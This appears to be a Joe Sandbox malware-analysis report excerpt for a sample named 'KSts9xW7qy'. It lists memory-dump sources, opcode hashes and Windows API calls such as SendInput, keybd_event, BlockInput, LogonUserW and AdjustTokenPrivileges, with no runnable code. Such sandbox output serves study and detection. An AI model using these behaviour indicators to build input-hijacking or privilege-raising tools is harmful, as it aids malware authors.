                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFormatLastMessage
                                                                        • String ID:
                                                                        • API String ID: 3479602957-0
                                                                        • Opcode ID: c7dc904668a89f697780e41fe6a5c4a59682f6d0abde8ad96182c53610ace8a3
                                                                        • Instruction ID: a3dc1fc5c13b3322506316506c0494d7e7590f4a73e8afa8f8a97f8b50aaf5d4
                                                                        • Opcode Fuzzy Hash: c7dc904668a89f697780e41fe6a5c4a59682f6d0abde8ad96182c53610ace8a3
                                                                        • Instruction Fuzzy Hash: 0DF08231504229FBDB209BA4DC89FFA776DFF08361F008166F919E6191D630DA44CBA1
                                                                        APIs
                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00EB4153
                                                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00EB4166
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: InputSendkeybd_event
                                                                        • String ID:
                                                                        • API String ID: 3536248340-0
                                                                        • Opcode ID: d3ce56f7d19195b4d6a146245c43679a1113c1817a87f2f52b1b72466a4850ef
                                                                        • Instruction ID: 269b2cbb4714c7d3235d3eb6c3eaf315e47118fd57b038b5633c4416e4258439
                                                                        • Opcode Fuzzy Hash: d3ce56f7d19195b4d6a146245c43679a1113c1817a87f2f52b1b72466a4850ef
                                                                        • Instruction Fuzzy Hash: 5CF0177090824DAFDB059FA5CC05BFE7FB4EF04309F04840AF966A6192D7798616DFA4
                                                                        APIs
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EAACC0), ref: 00EAAB99
                                                                        • CloseHandle.KERNEL32(?,?,00EAACC0), ref: 00EAABAB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 81990902-0
                                                                        • Opcode ID: 45147cbe3d71d5468b1bcce2762014da99f731c2665c065b09f091e6411683e2
                                                                        • Instruction ID: 77b53b583c8cd305f2e6c8c1de51aa902c6322da382357cc8ee7328c8f9c4c27
                                                                        • Opcode Fuzzy Hash: 45147cbe3d71d5468b1bcce2762014da99f731c2665c065b09f091e6411683e2
                                                                        • Instruction Fuzzy Hash: 83E0EC72004610AFE7252F65EC09D77BBEAEF48321B208829F99E91470DB62AD94DB50
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00E96DB3,-0000031A,?,?,00000001), ref: 00E981B1
                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E981BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 21cf091c5bd6584db31ec9b5d771a6ba59d9057d3275a0739347c46c7b1f9f3f
                                                                        • Instruction ID: ead7d9c006284cd2332c24df2dcaeb6a8c752fb30a17cbbe0ac43f156e2cb83a
                                                                        • Opcode Fuzzy Hash: 21cf091c5bd6584db31ec9b5d771a6ba59d9057d3275a0739347c46c7b1f9f3f
                                                                        • Instruction Fuzzy Hash: 4BB0923204D608AFDB002BA2EC09B6C7F6AEB88662F404010F70D540A18B725524DA92
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: e5f965c2476177899d556544eb500ebf1a31a30fb8b77a645e30e7138a2dcc34
                                                                        • Instruction ID: e4f68c88df137769e54bf4d211833446e9cc20d68e6a94c219f72b677c1d158a
                                                                        • Opcode Fuzzy Hash: e5f965c2476177899d556544eb500ebf1a31a30fb8b77a645e30e7138a2dcc34
                                                                        • Instruction Fuzzy Hash: E7A23971A04219CFDB24CF58C8806ADBBB1FF58314F2591AAD999BB391D7309E81DF90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                        • String ID: @
                                                                        • API String ID: 3728558374-2766056989
                                                                        • Opcode ID: e873faf23805a1173859f1541d821a310f95805bb5faaf63cc13da6029abfa4c
                                                                        • Instruction ID: 04277dcb99f98399c0e0dc7b85f0206cfcf89becf464ef9b207299c1d931426a
                                                                        • Opcode Fuzzy Hash: e873faf23805a1173859f1541d821a310f95805bb5faaf63cc13da6029abfa4c
                                                                        • Instruction Fuzzy Hash: 05729C70E042099FCF14EFA4C881AEEB7B5EF48704F24905AE94DBB291D771AE45CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 796d7007418a0579e2d38bc4fa170dae73dd48ef80f3fbc1e7b4901ae1ab0d7c
                                                                        • Instruction ID: b7964d7cd16fed86a2e1444d0d2bc78dccf0438b70f90699dc46876d4f8cba9a
                                                                        • Opcode Fuzzy Hash: 796d7007418a0579e2d38bc4fa170dae73dd48ef80f3fbc1e7b4901ae1ab0d7c
                                                                        • Instruction Fuzzy Hash: 8B323522D29F154DDB639634CD26335A289FFB73C4F15E737E819B5AAAEB28C4835100
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 674341424-0
                                                                        • Opcode ID: 480c561c9856757a20b14221bc6344bdaeca895d5b9bac252f88d0c9d8b35a06
                                                                        • Instruction ID: a88c27c9bda8715f6b8f9e492ec7587a011b4b0acec40702c1c208940059d542
                                                                        • Opcode Fuzzy Hash: 480c561c9856757a20b14221bc6344bdaeca895d5b9bac252f88d0c9d8b35a06
                                                                        • Instruction Fuzzy Hash: B3229B715083419FD724DF24C891BAFB7E4EF84314F10A91DF99AAB292DB71E905CB82
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 343b6a984a88c079e5ddd1e64162ef4418d1dc5c58d0c37f63e87920c52b2132
                                                                        • Instruction ID: 45515dac3dae392b93e227250daf0912cff0706acd070883dafac28e6f7992f1
                                                                        • Opcode Fuzzy Hash: 343b6a984a88c079e5ddd1e64162ef4418d1dc5c58d0c37f63e87920c52b2132
                                                                        • Instruction Fuzzy Hash: 8EB1F120D2AF454DD2239639883533BBA9CBFBB6D5F91D71BFC1A74D22EB2181835580
                                                                        APIs
                                                                        • __time64.LIBCMT ref: 00EBB6DF
                                                                          • Part of subcall function 00E9344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00EBBDC3,00000000,?,?,?,?,00EBBF70,00000000,?), ref: 00E93453
                                                                          • Part of subcall function 00E9344A: __aulldiv.LIBCMT ref: 00E93473
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                        • String ID:
                                                                        • API String ID: 2893107130-0
                                                                        • Opcode ID: bd8b5d0a5114ccfafc3759ddc3299ce2f181be18fca4c19a3eb9bb7cc8955b8b
                                                                        • Instruction ID: ed6e05c0f3ede4cc06dfebe2c43665de38e7a4f15eda1e09f3f3b449c728f263
                                                                        • Opcode Fuzzy Hash: bd8b5d0a5114ccfafc3759ddc3299ce2f181be18fca4c19a3eb9bb7cc8955b8b
                                                                        • Instruction Fuzzy Hash: 76218172634510CBC729CF38C881A92B7E1EB95321B248E7DE4E5CB2C0CB78BA05DB54
                                                                        APIs
                                                                        • BlockInput.USER32(00000001), ref: 00EC6ACA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BlockInput
                                                                        • String ID:
                                                                        • API String ID: 3456056419-0
                                                                        • Opcode ID: 917abd0e2f9bfb4e69a431552c8cd755c719d91aa8c17e3375f4553cae34cf2a
                                                                        • Instruction ID: bfb0c86e73e0db75efa2bd1d273f11ac2437eb899e772c9271c11a4caf4791e0
                                                                        • Opcode Fuzzy Hash: 917abd0e2f9bfb4e69a431552c8cd755c719d91aa8c17e3375f4553cae34cf2a
                                                                        • Instruction Fuzzy Hash: 05E048352042046FC700EF99D904E96F7EDEFB4755F04D41AF949E7251DAB1F8058B90
                                                                        APIs
                                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00EB750A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: mouse_event
                                                                        • String ID:
                                                                        • API String ID: 2434400541-0
                                                                        • Opcode ID: 4ee9ed963251e82640283418b22336d531a2389739f259bac3a7811625fcefdf
                                                                        • Instruction ID: 2e5dee5a6a1a92f4963f40d5b90a15aabad11ccfade1824daf6870dde8b9a220
                                                                        • Opcode Fuzzy Hash: 4ee9ed963251e82640283418b22336d531a2389739f259bac3a7811625fcefdf
                                                                        • Instruction Fuzzy Hash: 54D09EA416D60A79EC2A07249C1BFF71909F3C0786FD46549F6D7FD8C0A8D45E05E031
                                                                        APIs
                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EAAD3E), ref: 00EAB124
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: LogonUser
                                                                        • String ID:
                                                                        • API String ID: 1244722697-0
                                                                        • Opcode ID: 67c25001d74328de964288d493ef3e56a25f80ec33bb88258deb4d7de648ee46
                                                                        • Instruction ID: 7aa457e647e72b3d8c1914541f3821e694bca5c7bdc726adcb8fc8a6466e5d29
                                                                        • Opcode Fuzzy Hash: 67c25001d74328de964288d493ef3e56a25f80ec33bb88258deb4d7de648ee46
                                                                        • Instruction Fuzzy Hash: 25D05E320A460EAEDF024FA4DC02EBE3F6AEB04700F408110FA11D50A0C671D531EB50
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: f9a20a01f7ccc3e2f0c6d5e582f2bd01d35b520002ca5313a3aad56611a1798c
                                                                        • Instruction ID: 0dd3178808021f822dd47fee4fce10bbe4a4345f1a75df8c8108737ffe660cae
                                                                        • Opcode Fuzzy Hash: f9a20a01f7ccc3e2f0c6d5e582f2bd01d35b520002ca5313a3aad56611a1798c
                                                                        • Instruction Fuzzy Hash: 5BC04CB140414DDFC751CBC1CD449EEB7BDAB04301F2450959105F1110DB709B45DB72
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E9818F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 57030acf0c9f07d4ec486c094cea3cf35199045d720978115cdae2f7c96af7f8
                                                                        • Instruction ID: b4325ee8434148fd20ddccf7f2348ed459468b9ac24d69bfa36667f81eea26b7
                                                                        • Opcode Fuzzy Hash: 57030acf0c9f07d4ec486c094cea3cf35199045d720978115cdae2f7c96af7f8
                                                                        • Instruction Fuzzy Hash: 70A0113200820CAB8F002B82EC088A83F2EEB802A0B000020FA0C000208B22AA20AA82
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1249aec8149a5967857c41f1002a5c40b5034a39209ccd41f8bcc8a465b60b7
                                                                        • Instruction ID: a04e2387995007179cafe43e1473808a05bd0f83a304ed759503acf69c476f58
                                                                        • Opcode Fuzzy Hash: e1249aec8149a5967857c41f1002a5c40b5034a39209ccd41f8bcc8a465b60b7
                                                                        • Instruction Fuzzy Hash: 43229F709042098FDB24DF98C490AAAB7F1FF18318F14D1A9E99EBB351E771AD41CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9edaeaab2dba2a303edb019c431b35dbef9a25bf797ef58009905f1e856e7fa6
                                                                        • Instruction ID: 7f5afeb3d850bf5dcee95f27ba1ece569bef1ddece3879e911c808d0c7f0e55e
                                                                        • Opcode Fuzzy Hash: 9edaeaab2dba2a303edb019c431b35dbef9a25bf797ef58009905f1e856e7fa6
                                                                        • Instruction Fuzzy Hash: 0A127C70A006099FDF14DFA5D981AEEB7F9FF48304F10A629E40AF7251EB35A911CB54
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 3728558374-0
                                                                        • Opcode ID: 7be34294771a716c7794c5e9b1ba9904da39231a66dabe7395b97b1728b0e463
                                                                        • Instruction ID: 67e8f555804be28d0329b37850453bfd1a568f284711c3dccdea4d4fc4340270
                                                                        • Opcode Fuzzy Hash: 7be34294771a716c7794c5e9b1ba9904da39231a66dabe7395b97b1728b0e463
                                                                        • Instruction Fuzzy Hash: 64029070A00209DBCF14DF65D991AAEBBF9EF48300F14D469E90AFB255EB31DA11CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                        • Instruction ID: d87b31e5f349021fa7bbbd3d2bb2933c905fb93c57d4035e1a95960b556db5bd
                                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                        • Instruction Fuzzy Hash: 64C1D5722051930EDF2D863A847443EFBA15EA2BB931A276DD8B7DB4D1EF24C524D720
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                        • Instruction ID: ac7003d970febdf2bebc75015de195f4be911bf623300498d34cd36c78cec1d0
                                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                        • Instruction Fuzzy Hash: 97C1F3732051930EDF2D463AC47443EBAA15EA2BB930A276DD4B7EB0D5EF24C524D720
                                                                        Memory Dump Source
